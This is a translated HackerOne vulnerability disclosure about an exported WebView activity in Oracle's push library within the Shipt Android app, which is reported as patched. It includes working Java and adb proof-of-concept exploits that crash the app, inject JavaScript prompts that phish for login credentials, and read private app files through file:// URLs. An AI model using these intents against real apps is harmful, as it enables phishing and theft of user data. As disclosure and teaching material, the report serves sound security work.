导出的WebView活动存在安全漏洞-翻译文章
hackerone原文:跳转大法
漏洞总结:
在 Oracle 库的导出活动中发现了一个漏洞com.pushio.manager.iam.ui.PushIOMessageViewActivity,允许在没有方案验证的情况下打开 WebView 中的任意链接。在向 Oracle 报告后,为该库发布了一个补丁。之后Shipt及时更换了库,修复了漏洞。
漏洞详细
您好,我想报告发现的漏洞,由于以下Activitycom.pushio.manager.iam.ui.PushIOMessageViewActivity存在exported=true它可以被第三方应用程序利用。
漏洞
com.pushio.manager.iam.ui.PushIOMessageViewActivity已导出设置为 true,使Activity易受攻击。 AndroidManifest.xml如下
<activity android:name="com.pushio.manager.iam.ui.PushIOMessageViewActivity" android:theme="@android:style/Theme.Translucent.NoTitleBar">
<intent-filter>
<action android:name="android.intent.action.VIEW"/>
<category android:name="android.intent.category.DEFAULT"/>
<category android:name="android.intent.category.BROWSABLE"/>
<data android:scheme="@string/responsys_api_key"/>
</intent-filter>
</activity>com.pushio.manager.iam.ui.PushIOMessageViewActivity允许您与WebView交互的类中的一个问题:
protected void onStart() {
...
Bundle extras = getIntent().getExtras();
PIOLogger.d("PIOMVA oS extras: " + extras);
if (extras != null) {
final String content = extras.getString(Param.CONTENT);
final String url = extras.getString("url");
String viewType = extras.getString("type");
...
if (TextUtils.isEmpty(viewType)) {
PIOLogger.w("PIOMVA oS view type not found, closing window...");
finish();
return;
} else if (viewType.equalsIgnoreCase(PushIOMessageViewType.ALERT.toString())) {
...
public void run() {
try {
if (PushIOMessageViewActivity.this.mActivityWeakReference != null && PushIOMessageViewActivity.this.mActivityWeakReference.get() != null && !((Activity) PushIOMessageViewActivity.this.mActivityWeakReference.get()).isFinishing()) {
PushIOMessageViewActivity.this.mPopupWindow.showAtLocation(PushIOMessageViewActivity.this.mParentLayout, 17, 0, 0);
if (!TextUtils.isEmpty(content)) {
PushIOMessageViewActivity.this.mWebView.loadDataWithBaseURL(null, content, "text/html", "utf-8", null);
} else if (TextUtils.isEmpty(url)) {
PushIOMessageViewActivity.this.finish();
} else {
PushIOMessageViewActivity.this.mWebView.loadUrl(url);//load custom url
}
}
} catch (BadTokenException e) {
PIOLogger.d("PIOMVA oSt " + e.getMessage());
}借助特殊的intent,您可以传递if块并加载您自己的URL地址或Javascript
PushIOMessageViewActivity.this.mWebView.loadUrl(url);//加载自定义url您可以通过控制台adb或通过我的应用程序HunterExploit利用此漏洞
PoC 1 - Kill Process - 允许您停止shipt进程 - 信息可用性的威胁 Java PoC:
Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.shipt.groceries", "com.pushio.manager.iam.ui.PushIOMessageViewActivity");
intent.putExtra("url", "chrome://crash");
intent.putExtra("type", "alert");
startActivity(intent);adb POC:
adb shell am start -n com.shipt.groceries/com.pushio.manager.iam.ui.PushIOMessageViewActivity -a "android.intent.action.VIEW" --es "url" "chrome://crash" --es "type" "alert"PoC 2 - XSS - 允许网络钓鱼攻击Java PoC:
Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.shipt.groceries", "com.pushio.manager.iam.ui.PushIOMessageViewActivity");
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
intent.putExtra("url", "javascript:{var Login = window.prompt(\"Authorization: Login\", \"Input Login\");var Password = window.prompt(\"Authorization: Password\", \"Input Password\"); alert('Interception of data: '+Login+' '+Password)}");
intent.putExtra("type", "alert");
Intent intentStart = new Intent(Intent.ACTION_MAIN);
intentStart.setComponent(new ComponentName("com.shipt.groceries", "com.shipt.groceries.MainActivity"));
startActivity(intentStart);
try {
Thread.sleep(10000);
} catch (InterruptedException e) {
e.printStackTrace();
}
startActivity(intent);Adb poc:
adb shell am start -n com.shipt.groceries/com.shipt.groceries.MainActivity Wait for the application to load, and then run the following command adb shell am start -n com.shipt.groceries/com.pushio.manager.iam.ui.PushIOMessageViewActivity -a "android.intent.action.VIEW" --es "url" "javascript:{window.prompt\(\'Authorization:Login\'\,\'Input_Login\'\)\;window.prompt\(\'Authorization:Password\'\,\'Input_Password\'\)}" --es "type" "alert"PoC 3 - LFI - 允许您在没有root访问权限的情况下读取机密用户文件 - 信息机密性 Java PoC 的威胁:
Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.shipt.groceries", "com.pushio.manager.iam.ui.PushIOMessageViewActivity");
intent.putExtra("url", "file:///data/data/com.shipt.groceries/shared_prefs/pushio_store.xml");
intent.putExtra("type", "alert");
startActivity(intent);Adb poc:
adb shell am start -n com.shipt.groceries/com.pushio.manager.iam.ui.PushIOMessageViewActivity -a "android.intent.action.VIEW" --es "url" "file:///data/data/com.shipt.groceries/shared_prefs/pushio_store.xml" --es "type" "alert"PoC 4 - 读取文件或加载android_assetJava POC如下
Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.shipt.groceries", "com.pushio.manager.iam.ui.PushIOMessageViewActivity");
intent.putExtra("url", "file:///android_asset/www/index.html");
intent.putExtra("type", "alert");
startActivity(intent);Adb poc:
adb shell am start -n com.shipt.groceries/com.pushio.manager.iam.ui.PushIOMessageViewActivity -a "android.intent.action.VIEW" --es "url" "file:///android_asset/www/index.html" --es "type" "alert"